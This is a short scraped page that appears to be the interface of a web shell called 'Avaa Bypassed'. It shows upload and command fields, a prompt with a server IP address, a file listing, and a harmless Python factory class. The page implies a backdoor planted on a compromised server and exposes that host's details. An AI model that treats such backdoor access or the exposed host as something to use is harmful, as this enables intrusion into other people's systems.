404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.131.38.184: ~ $
from .instance import Instance

class Factory(object):
	def create(self, *args, **kwargs):
		instance = Instance(*args, **kwargs)
		return instance

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 60 B 0644
factory.py File 148 B 0644
instance.py File 1.92 KB 0644